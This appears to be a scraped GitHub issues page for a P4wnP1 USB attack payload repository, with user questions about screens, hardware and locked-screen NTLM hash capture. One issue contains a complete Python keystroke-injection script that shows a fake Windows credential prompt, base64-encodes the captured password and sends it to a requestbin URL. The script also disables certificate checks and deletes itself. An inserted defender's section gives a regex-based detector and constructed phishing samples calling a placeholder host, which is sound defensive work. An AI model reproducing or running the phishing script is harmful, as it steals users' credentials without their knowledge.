p4wnp1-a.l.o.a.-payloads's People

Contributors

ge0rg, nightrang3r

p4wnp1-a.l.o.a.-payloads's Issues

Known good LCD/OLED Screens

I'm looking for an LCD/OLED display that works with the preconfigured script. Are there some that have been tested to work, or do I need to buy one and hope it works?

Password grabber stopped working (using a Python script)

So I don't have an SD card for the Pi0W and I was going to make it in Python.
It's the same code, but on the last line I changed hidden to Normal.
I'm wondering if you can help me. I know this is not your code, so just close this issue if you don't want to deal with it.

My Python code

import pyautogui as p
import time
URL = "http://requestbin.net/r/dum96elf"
p.keyDown("win")
p.keyDown("r")
p.keyUp("win")
p.keyUp("r")
time.sleep(1)
p.typewrite("powershell\n")
time.sleep(1)
p.typewrite("$popup = \"while (`$true){`$cred = `$host.ui.promptforcredential(`'Failed Authentication`',`'`',[Environment]::UserDomainName + `\"\\`\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};if (`$cred.getnetworkcredential().password) {break :DoLoop}};`$Text = `$cred.username + `\":`\" + `$cred.getnetworkcredential().password;`$Bytes = [System.Text.Encoding]::Unicode.GetBytes(`$Text);`$EncodedText =[Convert]::ToBase64String(`$Bytes);Invoke-WebRequest -UseBasicParsing -Uri " + URL + "/`$EncodedText; rm $Env:UserProfile\\popup.ps1\"\n")
time.sleep(1)
p.typewrite("echo $popup > $Env:UserProfile\\popup.ps1\n")
time.sleep(1)
p.typewrite("powershell.exe -Exec Bypass -windowstyle Normal $Env:UserProfile\\popup.ps1\n")

The error I get

C:\Users\Jayden : The term 'C:\Users\Jayden' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ C:\Users\Jayden Robbin\popup.ps1
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Jayden:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
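
A defender's view of the script in this issue, as an added example that is not part of the original post or of the P4wnP1 project: a Python heuristic that scans PowerShell script-block text (for instance the content recorded by script block logging, Event ID 4104) for the combination of credential prompt, plaintext password access and web request seen above. The sample texts, the `collector.example` and `updates.example` hosts and all function names are constructed for illustration.

```python
import re

# Behaviours present in the script posted above, as case-insensitive patterns.
INDICATORS = {
    "credential_prompt": r"promptforcredential|get-credential",
    "plaintext_password": r"getnetworkcredential\(\)\.password",
    "tls_validation_off": r"servercertificatevalidationcallback",
    "base64_encode": r"\[convert\]::tobase64string",
    "web_request": r"invoke-webrequest|invoke-restmethod|net\.webclient",
    "self_delete": r"\b(rm|del|remove-item)\b[^;]*\.ps1",
}
# Alert on the combination only; any single indicator is common in admin scripts.
REQUIRED = {"credential_prompt", "plaintext_password", "web_request"}

def normalize(script):
    """Drop backtick escapes, collapse whitespace, lower-case (PowerShell ignores case)."""
    return re.sub(r"\s+", " ", script.replace("`", "")).lower()

def matched_indicators(script):
    text = normalize(script)
    return {name for name, rx in INDICATORS.items() if re.search(rx, text)}

def is_credential_phish(script):
    return REQUIRED <= matched_indicators(script)

# Constructed script-block texts (not real logs); collector.example is a placeholder.
SAMPLES = {
    "typed_with_escapes": r"""$popup = "while (`$true){`$cred = `$host.ui.promptforcredential(`'Failed Authentication`',`'`',`$u,`$d);if (`$cred.getnetworkcredential().password) {break}};Invoke-WebRequest -UseBasicParsing -Uri https://collector.example/`$EncodedText; rm $Env:UserProfile\popup.ps1" """,
    "written_file": r"""$cred = $Host.UI.PromptForCredential('Failed Authentication','',$u,$d); $Text = $cred.UserName + ':' + $cred.GetNetworkCredential().Password; $Enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Text)); Invoke-WebRequest -UseBasicParsing -Uri https://collector.example/$Enc""",
    "admin_session": r"$c = Get-Credential; Enter-PSSession -ComputerName srv01 -Credential $c",
    "plain_download": r"Invoke-WebRequest -Uri https://updates.example/tool.zip -OutFile C:\Temp\tool.zip",
}

def triage(samples):
    """Return the names of samples that show the full prompt-read-send pattern."""
    return sorted(name for name, text in samples.items() if is_credential_phish(text))

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, is_credential_phish(text), sorted(matched_indicators(text)))
```

Requiring all three behaviours keeps ordinary `Get-Credential` use and plain downloads from alerting; the remaining indicators are returned for analyst context only.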

Does the QuickCreds.sh work in 2024?

I have a Windows 10 Pro 10.0.19045 Build 19045 running in a VirtualBox VM (no guest tools installed).
I passed through the USB device and it gets a network (DHCP lease and so on) from the Pi0W, everything fine so far.

The attack works fine if I interact with the VM, unlock it and type some random \\teststring into the explorer search bar (pretty similar to the attack in QuickDraw.sh), because now there is a network request to my P4wnP1 poisoning device.

But when I lock the screen and start the attack, I can wait for hours and do not receive a hash.

I researched the attack a bit and found out it is from around 2016 and only works when network requests are made in the background. So I set up another VM with a DNS server and a Samba share. The Windows VM is able to request the server address from the DNS server and is able to access the Samba share via \\fakeshare.local. I mapped the network drive to a drive in Windows and locked the screen. After this setup, I connected the Pi0W again to the Windows VM and launched the attack script QuickCreds.sh. -> I don't get any hash.

In the Win VM:

  • automatic proxy detection is enabled
  • firewall is on on all networks
  • the SMB share is mounted with the credentials of the local windows user

As already said: the attack works fine if the screen is unlocked and I request something in the explorer search bar; there is just no NTLM hash sent when the screen is locked.

Can you help me out, or do you think Microsoft did mitigate this behaviour so the attack can't be exploited anymore?

Pi02W

Is it possible to run on a Raspberry Pi Zero 2W?
